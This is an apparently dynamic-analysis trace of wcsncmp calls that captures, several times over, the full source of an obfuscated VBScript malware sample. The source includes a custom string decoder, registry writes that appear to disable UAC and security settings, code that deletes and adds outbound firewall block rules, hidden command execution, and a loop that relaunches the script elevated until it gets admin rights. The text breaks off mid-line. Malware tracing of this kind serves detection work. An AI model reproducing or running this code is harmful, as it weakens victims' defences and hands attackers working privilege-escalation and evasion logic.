bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.287] wcsncmp (_String1="\"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.287] wcsncmp (_String1="chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 86 [0226.287] wcsncmp (_String1="have\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 91 [0226.287] wcsncmp (_String1="ave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run 